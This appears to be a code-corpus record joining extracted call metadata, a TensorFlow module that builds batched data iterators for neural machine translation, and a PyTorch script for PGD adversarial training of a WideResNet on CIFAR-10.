label='prediction')\n", (9931, 9957), True, 'import matplotlib.pyplot as plt\n'), ((9966, 9985), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (9976, 9985), True, 'import matplotlib.pyplot as plt\n'), ((9994, 10012), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Days"""'], {}), "('Days')\n", (10004, 10012), True, 'import matplotlib.pyplot as plt\n'), ((10021, 10044), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (10031, 10044), True, 'import matplotlib.pyplot as plt\n'), ((10053, 10071), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (10069, 10071), True, 'import matplotlib.pyplot as plt\n'), ((10626, 10642), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (10637, 10642), True, 'import matplotlib.pyplot as plt\n'), ((10651, 10689), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.close'], {'label': '"""price"""'}), "(self.df.close, label='price')\n", (10659, 10689), True, 'import matplotlib.pyplot as plt\n'), ((10698, 10736), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.sma20'], {'label': '"""sma20"""'}), "(self.df.sma20, label='sma20')\n", (10706, 10736), True, 'import matplotlib.pyplot as plt\n'), ((10745, 10783), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.sma50'], {'label': '"""sma50"""'}), "(self.df.sma50, label='sma50')\n", (10753, 10783), True, 'import matplotlib.pyplot as plt\n'), ((10792, 10832), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.sma200'], {'label': '"""sma200"""'}), "(self.df.sma200, label='sma200')\n", (10800, 10832), True, 'import matplotlib.pyplot as plt\n'), ((10841, 10853), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (10851, 10853), True, 'import matplotlib.pyplot as plt\n'), ((10862, 10881), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (10872, 10881), True, 'import matplotlib.pyplot as plt\n'), ((10890, 10913), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (10900, 10913), True, 'import matplotlib.pyplot as plt\n'), ((10922, 10950), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {'sharex': 'ax1'}), '(212, sharex=ax1)\n', (10933, 10950), True, 'import matplotlib.pyplot as plt\n'), ((10959, 10995), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.macd'], {'label': '"""macd"""'}), "(self.df.macd, label='macd')\n", (10967, 10995), True, 'import matplotlib.pyplot as plt\n'), ((11004, 11044), 'matplotlib.pyplot.plot', 'plt.plot', (['self.df.signal'], {'label': '"""signal"""'}), "(self.df.signal, label='signal')\n", (11012, 11044), True, 'import matplotlib.pyplot as plt\n'), ((11053, 11065), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (11063, 11065), True, 'import matplotlib.pyplot as plt\n'), ((11074, 11093), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (11084, 11093), True, 'import matplotlib.pyplot as plt\n'), ((11102, 11120), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Days"""'], {}), "('Days')\n", (11112, 11120), True, 'import matplotlib.pyplot as plt\n'), ((11129, 11152), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (11139, 11152), True, 'import matplotlib.pyplot as plt\n'), ((11161, 11179), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11177, 11179), True, 'import matplotlib.pyplot as plt\n'), ((11748, 11786), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': '(1)', 'figsize': '(12, 6)'}), '(ncols=1, figsize=(12, 6))\n', (11760, 11786), True, 'import matplotlib.pyplot as plt\n'), ((11862, 11878), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (11873, 11878), True, 'import matplotlib.pyplot as plt\n'), ((11986, 12010), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (11999, 12010), True, 'import matplotlib.pyplot as plt\n'), ((12019, 12081), 'matplotlib.pyplot.plot', 'plt.plot', (["df_subset['close']"], {'label': '"""price"""', 'color': '"""royalblue"""'}), "(df_subset['close'], label='price', color='royalblue')\n", (12027, 12081), True, 'import matplotlib.pyplot as plt\n'), ((12090, 12149), 'matplotlib.pyplot.plot', 'plt.plot', (["df_subset['ema12']"], {'label': '"""ema12"""', 'color': '"""orange"""'}), "(df_subset['ema12'], label='ema12', color='orange')\n", (12098, 12149), True, 'import matplotlib.pyplot as plt\n'), ((12158, 12217), 'matplotlib.pyplot.plot', 'plt.plot', (["df_subset['ema26']"], {'label': '"""ema26"""', 'color': '"""purple"""'}), "(df_subset['ema26'], label='ema26', color='purple')\n", (12166, 12217), True, 'import matplotlib.pyplot as plt\n'), ((12227, 12314), 'matplotlib.pyplot.tick_params', 'plt.tick_params', ([], {'axis': '"""x"""', 'which': '"""both"""', 'bottom': '(False)', 'top': '(False)', 'labelbottom': '(False)'}), "(axis='x', which='both', bottom=False, top=False,\n labelbottom=False)\n", (12242, 12314), True, 'import matplotlib.pyplot as plt\n'), ((15911, 15930), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Price"""'], {}), "('Price')\n", (15921, 15930), True, 'import matplotlib.pyplot as plt\n'), ((15939, 15962), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '(90)'}), '(rotation=90)\n', (15949, 15962), True, 'import matplotlib.pyplot as plt\n'), ((15971, 15989), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (15987, 15989), True, 'import matplotlib.pyplot as plt\n'), ((15998, 16010), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (16008, 16010), True, 'import matplotlib.pyplot as plt\n'), ((16092, 16102), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (16100, 16102), True, 'import matplotlib.pyplot as plt\n'), ((1955, 1988), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""green"""'}), "(x=idx, color='green')\n", (1966, 1988), True, 'import matplotlib.pyplot as plt\n'), ((2049, 2080), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""red"""'}), "(x=idx, color='red')\n", (2060, 2080), True, 'import matplotlib.pyplot as plt\n'), ((2372, 2382), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2380, 2382), True, 'import matplotlib.pyplot as plt\n'), ((4425, 4435), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4433, 4435), True, 'import matplotlib.pyplot as plt\n'), ((5236, 5246), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5244, 5246), True, 'import matplotlib.pyplot as plt\n'), ((5707, 5741), 'matplotlib.pyplot.axhline', 'plt.axhline', ([], {'y': 'level', 'color': '"""grey"""'}), "(y=level, color='grey')\n", (5718, 5741), True, 'import matplotlib.pyplot as plt\n'), ((6012, 6022), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6020, 6022), True, 'import matplotlib.pyplot as plt\n'), ((7588, 7621), 'matplotlib.ticker.FuncFormatter', 'ticker.FuncFormatter', (['format_date'], {}), '(format_date)\n', (7608, 7621), True, 'import matplotlib.ticker as ticker\n'), ((7907, 7940), 'matplotlib.ticker.FuncFormatter', 'ticker.FuncFormatter', (['format_date'], {}), '(format_date)\n', (7927, 7940), True, 'import matplotlib.ticker as ticker\n'), ((8268, 8278), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8276, 8278), True, 'import matplotlib.pyplot as plt\n'), ((9180, 9190), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9188, 9190), True, 'import matplotlib.pyplot as plt\n'), ((9791, 9820), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': 'days'}), '(days=days)\n', (9809, 9820), False, 'import datetime, re, sys\n'), ((10282, 10292), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10290, 10292), True, 'import matplotlib.pyplot as plt\n'), ((11390, 11400), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11398, 11400), True, 'import matplotlib.pyplot as plt\n'), ((12827, 12889), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""gx"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'gx')\n", (12835, 12889), True, 'import matplotlib.pyplot as plt\n'), ((13131, 13193), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""rx"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'rx')\n", (13139, 13193), True, 'import matplotlib.pyplot as plt\n'), ((13435, 13497), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""g^"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'g^')\n", (13443, 13497), True, 'import matplotlib.pyplot as plt\n'), ((13729, 13791), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""rv"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'rv')\n", (13737, 13791), True, 'import matplotlib.pyplot as plt\n'), ((14027, 14089), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""go"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'go')\n", (14035, 14089), True, 'import matplotlib.pyplot as plt\n'), ((14328, 14390), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""r*"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'r*')\n", (14336, 14390), True, 'import matplotlib.pyplot as plt\n'), ((14621, 14683), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""yd"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'yd')\n", (14629, 14683), True, 'import matplotlib.pyplot as plt\n'), ((14927, 14989), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""y^"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'y^')\n", (14935, 14989), True, 'import matplotlib.pyplot as plt\n'), ((15233, 15295), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""yv"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'yv')\n", (15241, 15295), True, 'import matplotlib.pyplot as plt\n'), ((15534, 15596), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""mv"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'mv')\n", (15542, 15596), True, 'import matplotlib.pyplot as plt\n'), ((15837, 15899), 'matplotlib.pyplot.plot', 'plt.plot', (['idx', "df_candlestick_in_range.loc[idx]['close']", '"""m^"""'], {}), "(idx, df_candlestick_in_range.loc[idx]['close'], 'm^')\n", (15845, 15899), True, 'import matplotlib.pyplot as plt\n'), ((16052, 16074), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outputpng'], {}), '(outputpng)\n', (16063, 16074), True, 'import matplotlib.pyplot as plt\n'), ((2223, 2244), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (2234, 2244), True, 'import matplotlib.pyplot as plt\n'), ((3669, 3702), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""green"""'}), "(x=idx, color='green')\n", (3680, 3702), True, 'import matplotlib.pyplot as plt\n'), ((4276, 4297), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (4287, 4297), True, 'import matplotlib.pyplot as plt\n'), ((5087, 5108), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (5098, 5108), True, 'import matplotlib.pyplot as plt\n'), ((5863, 5884), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (5874, 5884), True, 'import matplotlib.pyplot as plt\n'), ((6624, 6655), 'pandas.to_datetime', 'pd.to_datetime', (['df_subset.index'], {}), '(df_subset.index)\n', (6638, 6655), True, 'import pandas as pd\n'), ((8119, 8140), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (8130, 8140), True, 'import matplotlib.pyplot as plt\n'), ((9031, 9052), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (9042, 9052), True, 'import matplotlib.pyplot as plt\n'), ((10133, 10154), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (10144, 10154), True, 'import matplotlib.pyplot as plt\n'), ((11241, 11262), 'matplotlib.pyplot.savefig', 'plt.savefig', (['saveFile'], {}), '(saveFile)\n', (11252, 11262), True, 'import matplotlib.pyplot as plt\n'), ((12731, 12754), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (12737, 12754), True, 'import numpy as np\n'), ((13035, 13058), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13041, 13058), True, 'import numpy as np\n'), ((13339, 13362), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13345, 13362), True, 'import numpy as np\n'), ((13633, 13656), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13639, 13656), True, 'import numpy as np\n'), ((13931, 13954), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (13937, 13954), True, 'import numpy as np\n'), ((14232, 14255), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (14238, 14255), True, 'import numpy as np\n'), ((14525, 14548), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (14531, 14548), True, 'import numpy as np\n'), ((14831, 14854), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (14837, 14854), True, 'import numpy as np\n'), ((15137, 15160), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (15143, 15160), True, 'import numpy as np\n'), ((15438, 15461), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (15444, 15461), True, 'import numpy as np\n'), ((15741, 15764), 'numpy.min', 'np.min', (['df_subset.index'], {}), '(df_subset.index)\n', (15747, 15764), True, 'import numpy as np\n'), ((3849, 3880), 'matplotlib.pyplot.axvline', 'plt.axvline', ([], {'x': 'idx', 'color': '"""red"""'}), "(x=idx, color='red')\n", (3860, 3880), True, 'import matplotlib.pyplot as plt\n')]
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""For loading data into NMT models."""
# tp423 - Added comments
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import tensorflow as tf
__all__ = ["BatchedInput", "get_iterator", "get_infer_iterator"]
# NOTE(ebrevdo): When we subclass this, instances' __dict__ becomes empty.
# Acts as an interface from Java, used for checking classes.
class BatchedInput(collections.namedtuple("BatchedInput",
("initializer",
"source",
"target_input",
"target_output",
"source_sequence_length",
"target_sequence_length"))):
pass
def get_infer_iterator(dataset, vocab_table, batch_size, src_reverse,
eos, src_max_len):
"""
Returns an iterator for the inference graph which does not contain target data.
We do not use buckets for inference.
:param dataset: Data which we'll be working with.
:param vocab_table: Word to index mappings in the form of a tf HashTable.
:param batch_size: The number of consecutive elements of this dataset to combine in a single batch.
:param src_reverse: Whether to reverse the inputs (makes the beginning of the input
have a bigger impact on the response
:param eos: The end of sentence string
:param src_max_len: Maximum accepted length. Bigger inputs will be truncated.
"""
# Get the id for the eos token. We will use this to pad the data
eos_id = tf.cast(vocab_table.lookup(tf.constant(eos)), tf.int32)
# Tokenize the input data by applying split. For better tokenization data is expected to
# be tokenized in the preprocessing phase.
dataset = dataset.map(lambda line: tf.string_split([line]).values)
if src_max_len:
dataset = dataset.map(lambda line: line[:src_max_len])
# This map converts a vector of strings to a vector of integers
dataset = dataset.map(lambda line: tf.cast(vocab_table.lookup(line), tf.int32))
if src_reverse:
dataset = dataset.map(lambda line: tf.reverse(line, axis=[0]))
# Add in the word counts for each line.
dataset = dataset.map(lambda line: (line, tf.size(line)))
def batching_func(x):
return x.padded_batch(
batch_size,
# The entry is the source line rows;
# this has unknown-length vectors. The last entry is
# the source row size; this is a scalar.
padded_shapes=(tf.TensorShape([None]), # src
tf.TensorShape([])), # src_len
# Pad the source sequences with eos tokens.
# (Though notice we don't generally need to do this since
# later on we will be masking out calculations past the true sequence.
padding_values=(eos_id, # src
0)) # src_len -- unused
batched_dataset = batching_func(dataset)
batched_iter = batched_dataset.make_initializable_iterator()
(ids, seq_length) = batched_iter.get_next()
return BatchedInput(
initializer=batched_iter.initializer,
source=ids,
target_input=None,
target_output=None,
source_sequence_length=seq_length,
target_sequence_length=None
)
def get_iterator(src_dataset,
tgt_dataset,
vocab_table,
batch_size,
sos,
eos,
src_reverse,
random_seed,
num_buckets,
src_max_len=None,
tgt_max_len=None,
num_threads=4,
output_buffer_size=None,
skip_count=None):
"""
Create iterator for the training or evaluation graph.
:param sos: The 'start of string' string.
:param eos: The 'end of string' string
:param src_reverse: Whether to reverse the input.
:param random_seed: Seed used to fuel a pseudo-random number generator.
:param num_threads: The number of threads to use for processing elements in parallel.
:param output_buffer_size: The number of elements from this dataset from which the new dataset will sample
:param skip_count: The number of elements of this dataset that should be skipped to form the new dataset.
"""
if not output_buffer_size:
output_buffer_size = batch_size * 1000
sos_id = tf.cast(vocab_table.lookup(tf.constant(sos)), tf.int32)
eos_id = tf.cast(vocab_table.lookup(tf.constant(eos)), tf.int32)
dataset = tf.contrib.data.Dataset.zip((src_dataset, tgt_dataset))
# Skip the first skip_count elements.
if skip_count is not None:
dataset = dataset.skip(count=skip_count)
# Shuffle the dataset.
dataset = dataset.shuffle(output_buffer_size, random_seed)
# Split the lines into tokens.
dataset = dataset.map(lambda src, tgt: (tf.string_split([src]).values, tf.string_split([tgt]).values),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Filter zero length input sequences
dataset = dataset.filter(lambda src, tgt: tf.logical_and(tf.size(src) > 0, tf.size(tgt) > 0))
if src_max_len:
dataset = dataset.map(lambda src, tgt: (src[:src_max_len], tgt),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
if tgt_max_len:
dataset = dataset.map(lambda src, tgt: (src, tgt[:tgt_max_len]),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
if src_reverse:
dataset = dataset.map(lambda src, tgt: (tf.reverse(src, axis=0), tgt),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Convert the word strings to ids. Word strings that are not in the
# vocab get the lookup table's default_value integer.
dataset = dataset.map(lambda src, tgt: (tf.cast(vocab_table.lookup(src), tf.int32),
tf.cast(vocab_table.lookup(tgt), tf.int32)),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Create a tgt_input prefixed with <sos> and a tgt_output suffixed with <eos>.
dataset = dataset.map(lambda src, tgt: (src,
tf.concat(([sos_id], tgt), axis=0), # target input
tf.concat((tgt, [eos_id]), axis=0)), # target output, the input shifted
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Add in the word counts. Subtract one from the target to avoid counting
# the target_input <eos> tag (resp. target_output <sos> tag) (has not been done) .
dataset = dataset.map(lambda src, tgt_in, tgt_out: (src, tgt_in, tgt_out,
tf.size(src), tf.size(tgt_in)),
num_threads=num_threads,
output_buffer_size=output_buffer_size)
# Bucket by source sequence length (buckets for lengths 0-9, 10-19, ...)
def batching_func(x):
return x.padded_batch(
batch_size,
# The first three entries are the source and target line rows;
# these have unknown-length vectors. The last two entries are
# the source and target row sizes; these are scalars.
padded_shapes=(tf.TensorShape([None]), # src
tf.TensorShape([None]), # tgt_input
tf.TensorShape([None]), # tgt_output
tf.TensorShape([]), # src_len
tf.TensorShape([])), # tgt_len
# Pad the source and target sequences with eos tokens.
# (Though notice we don't generally need to do this since
# later on we will be masking out calculations past the true sequence.
padding_values=(eos_id, # src
eos_id, # tgt_input
eos_id, # tgt_output
0, # src_len -- unused
0)) # tgt_len -- unused
if num_buckets > 1:
def key_func(unused_1, unused_2, unused_3, src_len, tgt_len):
# Pairs with length [0, bucket_width) go to bucket 0, length
# [bucket_width, 2 * bucket_width) go to bucket 1, etc. Pairs with length
# over ((num_bucket-1) * bucket_width) words all go into the last bucket.
# If there is a max length find the width so that we equally split data in buckets.
# Calculate bucket_width by maximum source sequence length.
if src_max_len:
bucket_width = (src_max_len + num_buckets - 1) // num_buckets
else:
bucket_width = 10
# Bucket sentence pairs by the length of their source sentence and target
# sentence.
bucket_id = tf.maximum(src_len // bucket_width, tgt_len // bucket_width)
return tf.to_int64(tf.minimum(num_buckets, bucket_id))
def reduce_func(unused_key, windowed_data):
return batching_func(windowed_data)
# Maps each consecutive elements in this dataset to a key using key_func to at
# most window_size elements matching the same key.
batched_dataset = dataset.group_by_window(
key_func=key_func, reduce_func=reduce_func, window_size=batch_size
)
else:
batched_dataset = batching_func(dataset)
batched_iter = batched_dataset.make_initializable_iterator()
# Get a sample of what the data looks like.
(src_ids, tgt_input_ids, tgt_output_ids, src_seq_len, tgt_seq_len) = (
batched_iter.get_next())
return BatchedInput(
initializer=batched_iter.initializer,
source=src_ids,
target_input=tgt_input_ids,
target_output=tgt_output_ids,
source_sequence_length=src_seq_len, # Vector containing the sizes of the sequences without padding.Test - 173
target_sequence_length=tgt_seq_len)
|
[
"tensorflow.reverse",
"tensorflow.size",
"tensorflow.maximum",
"tensorflow.contrib.data.Dataset.zip",
"tensorflow.concat",
"tensorflow.constant",
"tensorflow.string_split",
"tensorflow.minimum",
"tensorflow.TensorShape",
"collections.namedtuple"
] |
[((1123, 1281), 'collections.namedtuple', 'collections.namedtuple', (['"""BatchedInput"""', "('initializer', 'source', 'target_input', 'target_output',\n 'source_sequence_length', 'target_sequence_length')"], {}), "('BatchedInput', ('initializer', 'source',\n 'target_input', 'target_output', 'source_sequence_length',\n 'target_sequence_length'))\n", (1145, 1281), False, 'import collections\n'), ((5417, 5472), 'tensorflow.contrib.data.Dataset.zip', 'tf.contrib.data.Dataset.zip', (['(src_dataset, tgt_dataset)'], {}), '((src_dataset, tgt_dataset))\n', (5444, 5472), True, 'import tensorflow as tf\n'), ((2413, 2429), 'tensorflow.constant', 'tf.constant', (['eos'], {}), '(eos)\n', (2424, 2429), True, 'import tensorflow as tf\n'), ((5304, 5320), 'tensorflow.constant', 'tf.constant', (['sos'], {}), '(sos)\n', (5315, 5320), True, 'import tensorflow as tf\n'), ((5373, 5389), 'tensorflow.constant', 'tf.constant', (['eos'], {}), '(eos)\n', (5384, 5389), True, 'import tensorflow as tf\n'), ((10024, 10084), 'tensorflow.maximum', 'tf.maximum', (['(src_len // bucket_width)', '(tgt_len // bucket_width)'], {}), '(src_len // bucket_width, tgt_len // bucket_width)\n', (10034, 10084), True, 'import tensorflow as tf\n'), ((2621, 2644), 'tensorflow.string_split', 'tf.string_split', (['[line]'], {}), '([line])\n', (2636, 2644), True, 'import tensorflow as tf\n'), ((2952, 2978), 'tensorflow.reverse', 'tf.reverse', (['line'], {'axis': '[0]'}), '(line, axis=[0])\n', (2962, 2978), True, 'import tensorflow as tf\n'), ((3070, 3083), 'tensorflow.size', 'tf.size', (['line'], {}), '(line)\n', (3077, 3083), True, 'import tensorflow as tf\n'), ((7342, 7376), 'tensorflow.concat', 'tf.concat', (['([sos_id], tgt)'], {'axis': '(0)'}), '(([sos_id], tgt), axis=0)\n', (7351, 7376), True, 'import tensorflow as tf\n'), ((7439, 7473), 'tensorflow.concat', 'tf.concat', (['(tgt, [eos_id])'], {'axis': '(0)'}), '((tgt, [eos_id]), axis=0)\n', (7448, 7473), True, 'import tensorflow as tf\n'), ((7928, 7940), 'tensorflow.size', 'tf.size', (['src'], {}), '(src)\n', (7935, 7940), True, 'import tensorflow as tf\n'), ((7942, 7957), 'tensorflow.size', 'tf.size', (['tgt_in'], {}), '(tgt_in)\n', (7949, 7957), True, 'import tensorflow as tf\n'), ((10116, 10150), 'tensorflow.minimum', 'tf.minimum', (['num_buckets', 'bucket_id'], {}), '(num_buckets, bucket_id)\n', (10126, 10150), True, 'import tensorflow as tf\n'), ((3363, 3385), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (3377, 3385), True, 'import tensorflow as tf\n'), ((3421, 3439), 'tensorflow.TensorShape', 'tf.TensorShape', (['[]'], {}), '([])\n', (3435, 3439), True, 'import tensorflow as tf\n'), ((5764, 5786), 'tensorflow.string_split', 'tf.string_split', (['[src]'], {}), '([src])\n', (5779, 5786), True, 'import tensorflow as tf\n'), ((5795, 5817), 'tensorflow.string_split', 'tf.string_split', (['[tgt]'], {}), '([tgt])\n', (5810, 5817), True, 'import tensorflow as tf\n'), ((6046, 6058), 'tensorflow.size', 'tf.size', (['src'], {}), '(src)\n', (6053, 6058), True, 'import tensorflow as tf\n'), ((6064, 6076), 'tensorflow.size', 'tf.size', (['tgt'], {}), '(tgt)\n', (6071, 6076), True, 'import tensorflow as tf\n'), ((6586, 6609), 'tensorflow.reverse', 'tf.reverse', (['src'], {'axis': '(0)'}), '(src, axis=0)\n', (6596, 6609), True, 'import tensorflow as tf\n'), ((8478, 8500), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8492, 8500), True, 'import tensorflow as tf\n'), ((8536, 8558), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8550, 8558), True, 'import tensorflow as tf\n'), ((8600, 8622), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8614, 8622), True, 'import tensorflow as tf\n'), ((8665, 8683), 'tensorflow.TensorShape', 'tf.TensorShape', (['[]'], {}), '([])\n', (8679, 8683), True, 'import tensorflow as tf\n'), ((8723, 8741), 'tensorflow.TensorShape', 'tf.TensorShape', (['[]'], {}), '([])\n', (8737, 8741), True, 'import tensorflow as tf\n')]
|
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
import argparse
import os
import os.path as osp
from pprint import pprint
from train import train_model
from model import WideResNet
from attacker import AttackerModel
def main():
parser = argparse.ArgumentParser(description='PGD based adversarial training')
args = parser.parse_args()
# Model options
args.adv_train = True
# Training options
args.dataset = 'cifar10'
args.batch_size = 128
args.max_epoch = 200
args.lr = 0.1
args.lr_step = 0.1
args.lr_milestones = [100, 150]
args.log_gap = 5
# Attack options
args.random_start = True
args.step_size = 2.0 / 255
args.epsilon = 8.0 / 255
args.num_steps = 7
args.targeted = False
# Miscellaneous
args.data_path = '~/datasets/CIFAR10'
args.result_path = './results/classifier'
args.tensorboard_path = './results/classifier/tensorboard/train'
args.model_save_path = osp.join(args.result_path, 'model.latest')
args.model_best_path = osp.join(args.result_path, 'model.best')
if not osp.exists(args.result_path):
os.makedirs(args.result_path)
pprint(vars(args))
transform_train = transforms.Compose([
transforms.RandomCrop(32, 4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
train_set = datasets.CIFAR10(root=args.data_path, train=True, download=True, transform=transform_train)
val_set = datasets.CIFAR10(root=args.data_path, train=False, download=True, transform=transform_test)
train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=2)
classifier = WideResNet(depth=28, num_classes=10, widen_factor=2)
model = AttackerModel(classifier, vars(args))
model = torch.nn.DataParallel(model)
model = model.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=0.9, weight_decay=2e-4)
schedule = optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.lr_milestones, gamma=args.lr_step)
writer = SummaryWriter(args.tensorboard_path)
# writer = None
train_model(args, train_loader, val_loader, model, optimizer, schedule, writer)
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"os.makedirs",
"torchvision.transforms.RandomHorizontalFlip",
"os.path.exists",
"model.WideResNet",
"train.train_model",
"torchvision.transforms.ToTensor",
"torchvision.datasets.CIFAR10",
"torch.utils.tensorboard.SummaryWriter",
"torch.nn.DataParallel",
"os.path.join",
"torchvision.transforms.RandomCrop",
"torch.optim.lr_scheduler.MultiStepLR"
] |
